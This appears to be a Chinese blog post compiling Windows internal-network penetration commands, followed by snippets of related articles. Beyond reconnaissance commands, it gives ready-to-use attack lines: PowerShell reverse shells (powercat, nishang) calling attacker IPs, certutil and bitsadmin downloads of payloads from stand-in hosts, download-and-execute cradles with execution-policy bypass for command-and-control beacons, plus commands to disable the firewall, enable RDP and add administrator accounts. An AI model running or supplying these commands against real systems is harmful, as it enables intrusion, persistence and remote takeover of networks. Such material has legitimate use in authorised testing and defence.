Windows内网渗透信息搜集命令总汇

一颗小胡椒2021-12-06 21:48:04

一、正文

前几天面试的时候被师傅问到了这个问题,当时不是很会,现在来学学

二、本机信息收集

1、查询网络配置信息

ipconfig /all

2、查询本机的服务信息

wmic service list brief

3、查询系统信息

systeminfo

4、查询进程列表

tasklist / wmic process list brief

5、查看计划任务

schtasks /query /fo LIST /v 列出计划任务详细信息

6、查看主机开机时间

net statistics workstation

7、用户相关

net user 查看所有用户

net localgroup administrators 获取本地管理员信息

8、查看端口列表

netstat -ano

9、查看已打补丁

wmic qfe get Caption,Description,HotFixID,InstalledOn

10、查看共享列表

net share 查看本机共享列表和可访问的域共享列表

wmic share get name,path,status 查找共享列表

11、路由表和arp高速缓存表

route print 路由表

arp -a arp高速缓存表

12、防火墙

netsh firewall set opmode disable 关闭防火墙(Windows Server 2003 以前的版本)

netsh advfirewall set allprofiles state off 关闭防火墙(Windows Server 2003 以后的版本)

netsh firewall show config 查看防火墙配置

如果上面的命令被弃用,则使用

netsh advfirewall firewall show rule name=all

根据参考,可以使用这个wmic一键获取本机信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar

三、域信息收集

1、权限查看

whoami /all 查看自己的详细权限

net user xxx /domain 查看域内指定用户的权限

2、判断是否存在域

.net time /domain 若出现以下情况则不存在域

若是报错:发生系统错误5,则存在域,但该用户不是域用户

若是以下情况则说明存在域且已经在域中

3、查看域的名字

net config workstation

nslookup -type=srv _ldap._tcp

这个很爽,域控主机名和IP一块弄出来了

4、探测域内存活主机

(1).使用工具 nbtscan http://www.unixwiz.net/tools/nbtscan.html

(2).查看arp高速缓存表

arp -a

(3).ICMP协议探测(逐个ping)

这个贼慢,但是不用下载其他应用

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL"

(4).nmap直接开扫

(5).meterpreter会话中执行 run windows/gather/enum_ad_computers

5、扫描域内开放端口

(1).nmap

nmap 192.168.1.0/24

(2).工具 S扫描器

(3).自写脚本

#python3 慢的一批
import socket
 
def get_ip_status(ip,port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.connect((ip,port))
        print('{0} port {1} is open'.format(ip, port))
    except Exception as err:
        print('{0} port {1} is not open'.format(ip,port))
    finally:
        server.close()
 
if __name__ == '__main__':
    host = '172.16.0.198'
    for port in range(20,100):
        get_ip_status(host,port)

6、域内基本信息

net group “domain computers” /domain 查询所有域成员计算机列表

net view /domain:HACHE 查询域内所有主机

net accounts /domain 获取域密码信息

nltest /domain_trusts 获取域信任信息

nltest /DCLIST:hacke 查看域控制器机器名

Nslookup -type=SRV_ldap._tcp 查看域控制器的主机名

7、域用户信息收集

net user /domain 向域控制器查询域内用户列表

wmic useraccount get /all 获取域内用户详细信息

net localgroup administrators 查询本地管理员用户

net group “domain admins” /domain 查询域管理员用户

net group “Enterprise admins” /domain 查询管理员用户组

8、本机wmic查杀软

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

or

WMIC /namespace:\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

9、开3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

10、用户增删改查

net user username password /add 加用户

net localgroup administrators username /add 添加XX到管理员账户

11、一些喜欢用的

Windows 反弹shell

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666

wmic 查杀软

WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

开3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 0

常见杀软进程名

https://blog.csdn.net/weixin_39997829/article/details/92666552

cmd下载

bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

获取盘符

wmic logicaldisk where drivetype=3 get deviceid

12、ps cs 上线

powershell.exe -c IEX((new-object net.webclient).downloadstring('http://xxx/a.ps1'))
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
powershell -exec bypass -f \\webdavserver\folder\payload.ps1   (smb)

版权申明:内容来源网络,版权归原创者所有。除非无法确认,都会标明作者及出处,如有侵权烦请告知,我们会立即删除并致歉。谢谢!

domainnamespace
本作品采用《CC 协议》,转载必须注明作者和本文链接
systeminfo | findstr /B /C:"OS Name" /C:"OS Version". systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" #中文操作系统。schtasks /query /fo LIST /v #query显示所有计划任务。
本机信息收集 查询网络配置信息 ipconfig /all 查询本机的服务信息 wmic service list brief
主机信息搜集 查看系统信息 systeminfo Windows 辅助提权 http://payloads.net/Windows_patch/
网渗透信息搜集命令总汇
SharpStrike是一款基于C#开发的后渗透工具,该工具可以使用CIM或WMI来查询远程系统。除此之外,该工具还可以使用研究人员提供的凭证信息或使用当前的用户会话。 注意:SharpStrike中的某些命令将使用PowerShell结合WMI以实现其功能。
ldap连接地址为:ldap://192.168.11.16 用户为hack 密码为test123.. 在域外我们需要指定ip地址,在域内我们只需要指定域名也行,例如测试环境的redteam,也就是ldap://redteam,这里就说明我们写代码的时候就需要考虑是在域内还是在域外。 在c#进行ldap连接的时候需要引入DirectoryServices.dll,这个是系统自带的,自行寻找。
信息搜集:开源情报信息收集、创建企业密码字典进入内网:基于企业弱账号漏洞、基于系统漏洞进入、网站应用程序渗透隐匿攻击:Command and Control、代理内网跨边界应用:内网跨边界转发、内网跨边界代理穿透、shell反弹等
一个内网安全攻防的知识仓库
前言作为一个资深后端码农天天都要和数据库打交道,最早使用的是 Hiberate,一个封装性极强的持久性框架。自从接触到 Mybatis 就被它的灵活性所折服了,可以自己写 SQL,虽然轻量级,但是麻雀虽小,五脏俱全。这篇文章就来讲讲什么是 Mybatis,如何简单的使用 Mybatis。
一颗小胡椒
暂无描述